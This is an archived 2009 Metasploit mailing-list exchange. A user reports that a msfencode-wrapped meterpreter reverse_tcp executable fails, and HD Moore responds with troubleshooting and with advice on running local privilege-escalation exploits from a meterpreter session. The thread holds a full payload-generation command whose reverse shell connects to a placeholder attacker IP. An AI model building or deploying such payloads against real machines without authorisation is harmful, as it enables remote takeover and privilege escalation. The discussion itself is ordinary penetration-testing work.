Metasploit mailing list archives
Questions...
From: hdm at metasploit.com (HD Moore)
Date: Fri, 26 Jun 2009 08:05:13 -0500
On Fri, 26 Jun 2009 03:08:10 -0500, Karlsson Anders <anders.karlsson at atea.se> wrote:
First I am having some problems with msfencode. When creating a payload the exe file does not work (I am not getting any connection back to my computer from victim) and I can see that the exe file starts and closes/crashes? in Windows Task Manager on "victim". I am using the command: ./msfpayload windows/meterpreter/reverse_tcp LHOST=(my_attacker_ip) LPORT=80 R | ./msfencode -b ' ' -t exe -o /tmp/reverse.exe If I create the same payload without using msfencode (old style) the exe file works perfectly! What am I doing wrong with msfencode?
We have made a ton changes lately, it wouldn't be surprising if something broke. I just tested the latest revision on WinXP SP3, everything checks out OK there with the reverse payload and the same command line. One known bug right is that Windows 2000 support is broken in the bind|reverse stagers, this was introduced when Windows 7 support was added and should be fixed very soon. In your command line above, you are specifying 0x20 as your "bad character" for the -b argument, is this intentional?
Sometimes a victim is not local admin on his machine (when running a payload like above, without exploitation). How can I run "local exploits" on that machine from a meterpreter session like the "Local Privilege Escalation attacks" in Core Impact? I want to be admin you know....
The quick answer is write a Meterpreter script that uploads the executable implementing the local exploit and runs it. The Meterpreter API provides most of the functionality you need, and you can even build local priv escalation attacks as Meterpreter extensions. -HD
Current thread:
- Questions... Karlsson Anders (Jun 26)
- Questions... HD Moore (Jun 26)